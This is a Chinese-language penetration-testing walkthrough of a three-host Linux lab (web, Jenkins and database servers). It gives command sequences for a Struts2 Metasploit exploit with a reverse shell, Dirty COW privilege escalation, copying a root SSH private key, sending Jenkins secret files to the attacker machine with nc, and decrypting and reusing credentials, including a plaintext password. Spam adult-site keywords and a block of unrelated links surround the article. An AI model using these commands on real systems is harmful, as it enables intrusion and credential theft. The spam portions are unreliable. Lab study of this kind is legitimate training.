色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

Linux橫向移動手法-CSK靶機

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2022-12-22 10:12 ? 次閱讀

前言

Linux中橫向移動手法相對Windows來說較少,相對來說我們只有利用SSH、web上的漏洞等較少方式去獲得權限 在SSH協議中,連接到主機可采用兩種登錄方式:密碼登錄方式、密鑰登錄方式 密碼登錄方式,相信大家都明白它的工作原理,這里就不再贅述。對此我們可以來嘗試爆破密碼的方式來嘗試登錄到遠程系統權限 密鑰登錄方式的原理是:利用密鑰生成器制作一對密鑰,其中一只公鑰,一只私鑰。將公鑰添加到服務器的某個賬戶上,然后在客戶端利用私鑰即可完成認證并登錄。這樣一來,沒有私鑰,任何人都無法通過SSH暴力破解用戶的密碼來遠程登錄系統。那這里我們可以通過獲取該目標服務器的SSH私鑰信息即可獲得該服務器的遠程登錄權限 一般ssh密鑰文件都存放在~/.ssh/目錄下,也可以在文件中搜索已保存的SSH憑證。

敏感文件 ~/.ssh/config #配置 ssh 連接相關參數的配置文件 ~/.ssh/known_hosts # 該服務器所有登錄過的服務器的信息 ~/.bash_history # 我們通過歷史命令可以看到該服務器中有沒有使用ssh私鑰去遠程連接服務器 搜索含有SSH憑證文件 grep -ir "BEGIN RSA PRIVATE KEY" /* grep -ir "BEGIN DSA PRIVATE KEY" /* grep -ir "BEGIN OPENSSH PRIVATE KEY" /*

在這里,我用一個純Linux的內網靶機環(huán)境來做演示,首先我們來看一下當前內網環(huán)境的拓撲圖。

2d877b62-8111-11ed-8abf-dac502259ad0.png

通過拓撲圖我們可以看到在當前內網環(huán)境中,一共有3臺機器,一臺是web服務器,同時也連接著互聯網,另外兩臺分別為數據庫服務器與Jenkins服務器,他們的網絡環(huán)境中是做了限制的,web服務器對外開放,可直接訪問。jenkins服務器的web應用只允許當前內網環(huán)境的主機訪問,數據庫服務器不出網,用于實現站庫分離設計模式。網絡劃分配置如下:點擊編輯 ->虛擬網絡編輯器-> 更改設置,之后選擇需要設置NAT類型的界面,修改子網IP為172.16.250.0 ,并點擊應用。

2d9ae800-8111-11ed-8abf-dac502259ad0.png

場景演示

首先我們先對入口點IP地址做一個端口掃描。

這里我們訪問它的80端口,發(fā)現是該系統的CMS為OpenCms 10.5,通過漏洞庫得知該系統存在 struts2 命令執(zhí)行漏洞。

2dcbcac4-8111-11ed-8abf-dac502259ad0.png

訪問一下struts2-showcase路徑,看是否成功。

2ddeff54-8111-11ed-8abf-dac502259ad0.png

由此確定使用struts2并且是struts2 showcase,msf上可以利用這個漏洞。直接在msf中 search struts2,這里直接選擇第一個利用即可。

2e077fa6-8111-11ed-8abf-dac502259ad0.png

設置攻擊IP地址與反彈shell方式。

set rhost 172.16.250.10 set rport 80 set payload linux/x64/meterpreter/reverse_tcp set lhot 172.160.250.128 set lport 4444

2e386b66-8111-11ed-8abf-dac502259ad0.png

可以看到shell被成功反彈過來。

2eb2f91c-8111-11ed-8abf-dac502259ad0.png

可以看到當前shell被反彈過來,并且權限為tomcat權限,這里的權限對我們來說相對較低,于是選擇提權。首先上傳一個linux-exploit-suggester腳本用于定位當前系統適合怎樣的方式進行提權。由于這時候我們得到的shell不是tty類型的,改為tty使得shell更加穩(wěn)定,然后賦予當前文件一個執(zhí)行權限,將其執(zhí)行。

upload /root/Desktop/linux-exploit-suggester.sh /tmp/aa.sh shell python3 -c "import pty;pty.spawn('/bin/bash')" chmod u+x /tmp/aa.sh ./tmp/aa.sh

2ee83032-8111-11ed-8abf-dac502259ad0.png

運行之后就可以看到適合當前系統的提權方式,這里我選擇使用臟牛來進行提權(在實戰(zhàn)中請謹慎使用臟牛提權,該提權方式容易造成業(yè)務宕機) 這里步驟和我們剛剛上傳提權定位腳本基本一致,首先將exp上傳到shell中,將exp進行編譯,將shell改為tty,直接執(zhí)行編譯后的exp。

upload /root/Desktop/dirtycow-mem.c /tmp/cow.c shell python3 -c "import pty;pty.spawn('/bin/bash')" gcc -Wall -o /tmp/dirtycow /tmp/cow.c -ldl -lpthread chmod u+x /tmp/dirtycow ./tmp/dirtycow

2f10cd4e-8111-11ed-8abf-dac502259ad0.png

這里我們在拿到root權限之后,為了保持穩(wěn)定需要輸入下面兩條命令,不然web服務器會死機。

echo 0 > /proc/sys/vm/dirty_writeback_centisecs echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn

2f3f01a0-8111-11ed-8abf-dac502259ad0.png

經過長時間的信息收集后,發(fā)現配置文件/opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties中有一條數據庫登錄的信息,判斷出當前數據庫服務器為172.16.250.50。

2f5fb562-8111-11ed-8abf-dac502259ad0.png

發(fā)現該站為站庫分離系統,這里查看root目錄下的.ssh目錄發(fā)現存在一個私鑰文件。

2f82d3da-8111-11ed-8abf-dac502259ad0.png

這里再去查看root用戶的歷史命令發(fā)現該用戶使用該密鑰連接了172.16.250.30,那這里我們可以將該服務器的私鑰文件下載到我們的攻擊機中,然后使用攻擊機去連接數據庫服務器,因為我們現在所在的是提權的root用戶bash,在msf中是tomcat的權限,我們無法直接下載root目錄下的ssh私鑰,所以我們需要先將私鑰復制到/tmp/目錄下,然后將它基于777的權限,在使用msf將其下載到我們的攻擊機中。

cp ~/.ssh/id_rsa /tmp/id_rsa chmod 777 /tmp/id_rsa exit download /tmp/id_rsa /root/is_rsa

2f9481b6-8111-11ed-8abf-dac502259ad0.png

這里給拖出來的私鑰一個0700的執(zhí)行權限,然后使用ssh去連接172.16.250.30。

chmod 0700 id_rsa ssh -i id_rsa root@172.16.250.30

2faa0752-8111-11ed-8abf-dac502259ad0.png

這里成功拿到第二臺主機權限,權限為root,hostname為jenkins,這里對它進行一個信息收集發(fā)現該系統開放一個8080端口。

2fc20e42-8111-11ed-8abf-dac502259ad0.png

這里搭建一個socks代理訪問一下看看當前jenkins服務器中8080端口所開放的是一個什么站點。

use auxiliary/server/socks5 set srvhost 172.16.250.128 run

2ff0edde-8111-11ed-8abf-dac502259ad0.png

然后修改proxychains文件。

30275b30-8111-11ed-8abf-dac502259ad0.png

使用proxychains啟動firefox。

proxychains firefox

3041dd34-8111-11ed-8abf-dac502259ad0.png

這里我們訪問Jenkins應用程序內的憑證管理器內部,看到db_backup用戶密碼已存儲,但不可見,我們需要弄清楚如何從Jenkins中獲取此憑據,以便我們可以繼續(xù)橫向移動。

30a5e69e-8111-11ed-8abf-dac502259ad0.png

這里我們選擇“Update”來更新密碼。

30c56d66-8111-11ed-8abf-dac502259ad0.png

將password置空即可得到密碼。

30d6faf4-8111-11ed-8abf-dac502259ad0.png

2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=訪問/jenkins/script/console目錄,使用以下命令獲取明文。

println(hudson.util.Secret.fromString("{2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=}").getPlainText())發(fā)現失敗,這里直接獲取jenkis的加密密鑰文件,下載到本機使用jenkis進行解密,credentials.xml,master.key和hudson.util.Secret。

30ecf282-8111-11ed-8abf-dac502259ad0.png

訪問發(fā)現該3個文件存在,使用nc將文件傳到我們的kali中。

nc -lvp 8888 > master.key nc -lvp 8888 > hudson.util.Secret nc -lvp 8888 > credentials.xml nc 172.16.250.128 8888 < /home/jenkins/secrets/hudson.util.Secret nc 172.16.250.128 8888 < /home/jenkins/secrets/master.key nc 172.16.250.128 8888 < /home/jenkins/credentials.xml

31193716-8111-11ed-8abf-dac502259ad0.png

可以看到文件都被下載到了我們的攻擊機中,這里我們下載解密腳本,將密鑰文件放到腳本中進行解密。

git clone https://github.com/cheetz/jenkins-decrypt.git python3 decrypt.py master.key hudson.util.Secret credentials.xml

31521efa-8111-11ed-8abf-dac502259ad0.png

這里成功解密db_backup用戶的密碼,使用ssh進行連接。

)uDvra{4UL^;r?*h

proxychains ssh db_backup@172.16.250.50

31814acc-8111-11ed-8abf-dac502259ad0.png

可以看到成功登錄到172.16.250.50系統中,這里使用id查看到該用戶屬于在sudo組,所以可以使用sudo su命令進行提權,然后輸入db_backup用戶的密碼,即拿到了該系統root系統的權限。

sudo su

325d0972-8111-11ed-8abf-dac502259ad0.png

至此成功獲取到WEB服務器(172.16.250.10)的權限、內網主機172.16.250.30的權限、內網數據庫服務器172.16.250.50的權限。本文章主要介紹了Linux環(huán)境下的內網滲透手法,但想文章前言所述一樣,在Linux中的橫向手法很少,所以主要還是偏向于SSH和web方面的漏洞,在Linux的內網環(huán)境中,要做的還是要收集到更多有價值的信息,查看歷史命令等。從而在進行下一步滲透。

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯系本站處理。 舉報投訴
  • Linux
    +關注

    關注

    87

    文章

    11296

    瀏覽量

    209358
  • 服務器
    +關注

    關注

    12

    文章

    9129

    瀏覽量

    85344
  • WINDOWS
    +關注

    關注

    3

    文章

    3541

    瀏覽量

    88633
  • CSK
    CSK
    +關注

    關注

    0

    文章

    4

    瀏覽量

    6309

原文標題:Linux橫向移動手法-CSK靶機

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    自己動手做簡單移動電源

    網上淘了塊壓克力板,自己動手移動電源自己動手移動電源
    發(fā)表于 10-26 11:51

    深圳全自動打靶機系統,高解析CCD掃描定位打孔

    目前我們常說的打靶機(打孔機)事實上包括兩類:沖孔機和鉆孔機,沖孔機是為軟性材料打孔,鉆孔機是為硬質材料打孔,兩者不可以通用,是兩種完全不同用途的機械。那么從這個意義上而言,“打靶機(打孔機)”是一
    發(fā)表于 04-26 10:00

    變頻電源的操作手法

    在你購買任何一樣電器產品的時候,銷售員都會告訴你使用方法是怎樣的,應該注意些什么。因為每個產品都會用專用的操作手法,這樣就會在避免操作錯誤或者不當而造成損害。變頻電源也是一樣,也有正確的操作手法
    發(fā)表于 12-30 07:09

    常用QC手法應用實務

    常用QC手法應用實務 本課程以實際應用為導向,說明并整合QC7手法與新QC7手法(管理7手法)以講師資深實務經驗,依企業(yè)實際狀況,組合改善活動常用工具、方法,參加學員除
    發(fā)表于 02-01 14:02 ?59次下載

    高速移動平臺橫向運動自抗擾控制

    高速移動平臺橫向運動自抗擾控制:采用自抗擾控制(activedisturbancerejectioncontrol,ADRC)方法,對高速輪式車輛和機器人等移動
    發(fā)表于 03-18 16:20 ?21次下載

    移動手機中的MAX IIZ CPLD培訓資料

    移動手機中的MAX IIZ CPLD培訓資料
    發(fā)表于 03-23 16:58 ?0次下載

    聲控飛碟拋靶機電路圖

    聲控飛碟拋靶機電路圖
    發(fā)表于 11-06 12:31 ?1393次閱讀
    聲控飛碟拋<b class='flag-5'>靶機</b>電路圖

    2010移動手持顯示技術大會

    2010移動手持顯示技術大會 時間:2010年7月9日       地點:深圳 中國唯一專注于中小尺
    發(fā)表于 02-16 11:39 ?755次閱讀
    2010<b class='flag-5'>移動手</b>持顯示技術大會

    基于DPS的帶推力變向的高速靶機飛控實現

    靶機是一種特殊的無人機,主要承擔檢驗對空武器系統的戰(zhàn)術、技術性能。目前,高速靶機作為測試和評估導彈的空中目標是需求量最大的一種。上個世紀60年代,由趙煦院士園隊研發(fā)的長空系列靶機是我國典型的高亞音速
    發(fā)表于 02-01 10:35 ?0次下載
    基于DPS的帶推力變向的高速<b class='flag-5'>靶機</b>飛控實現

    一文讀懂 CSK斷線連接器和CCP電纜連接器

    CSK斷線連接器和CCP電纜連接器到底有什么不同?總的來說就是CSK比CCP更容易安裝,但是從長遠來說,CCP使用更廣泛,更耐用。
    發(fā)表于 06-18 09:37 ?1953次閱讀

    動手編譯Linux內核的教程免費下載

    本文檔的主要內容詳細介紹的是動手編譯Linux內核的教程免費下載。
    發(fā)表于 11-26 17:01 ?14次下載

    移動手持PDA的定義及優(yōu)勢

    移動手持PDA其實就是可用于數據采集,信息處理、信息查詢的移動手持數據采集器。因其可手持,可移動且具備操作系統的特性,廣泛用于工廠生產、倉儲盤點、物流配送等領域。手持PDA通過實時數據采集存儲,減少了工人作業(yè)的失誤,提高了企業(yè)效
    發(fā)表于 03-25 09:14 ?2465次閱讀

    桌面版操作機與WEB靶機的搭建與實驗操作

    環(huán)境的linux虛擬機來完成桌面版操作機與WEB靶機的搭建與實驗操作。 Docker 包括三個基本概念:● 鏡像(Image)● 容器(Container)● 倉庫(Repository)操作機與靶機
    的頭像 發(fā)表于 09-29 18:09 ?2213次閱讀
    桌面版操作機與WEB<b class='flag-5'>靶機</b>的搭建與實驗操作

    51單片機-點陣模塊-橫向移動-i love u

    51單片機-點陣模塊-橫向移動-i love u-<>
    發(fā)表于 11-17 12:06 ?27次下載
    51單片機-點陣模塊-<b class='flag-5'>橫向</b><b class='flag-5'>移動</b>-i love u

    聆思CSK6芯片性能與應用前景分析

    聆思CSK6芯片性能與應用前景分析
    的頭像 發(fā)表于 05-15 09:11 ?744次閱讀
    主站蜘蛛池模板: 十8禁用B站在线看漫画| 蜜臀AV中文字幕熟女人妻| 精品亚洲麻豆1区2区3区| 经典三级四虎在线观看| 久久亚洲精品中文字幕60分钟| 久久久久久久久a免费| 女人张腿让男人桶免费| 日产久久视频| 性xxx在线观看| 中国女人精69xxxxxx视频| 99久久国产宗和精品1上映| 丰满老熟女白浆直流| 国产在线观看免费观看| 九九热国产视频| 欧美亚洲日韩在线在线影院| 无人区乱码区1卡2卡三卡在线| 亚洲人成无码久久久AAA片| 综合网伊人| 成人国产亚洲欧美成人综合网| 国产午夜精品一区二区理论影院| 娇小亚裔被两个黑人| 牛牛在线精品视频| 我的好妈妈BD免费观看| 艺术片 快播| 大香交伊人| 精品无码日本蜜桃麻豆| 奇米网一区二区三区在线观看| 性生生活大片又黄又| 最近2018年手机中文字幕| 国产AV天堂一区二区三区| 久久久性色精品国产免费观看 | 国产在线高清视频无码不卡| 毛片免费在线视频| 少妇的肉体AA片免费| 中文字幕精品在线观看| 国产成人精品自线拍| 绿巨人www在线观看| 甜性涩爱dvd| 99久久久久亚洲AV无码| 国产午夜精品理论片影院| 欧美日韩精品一区二区三区四区 |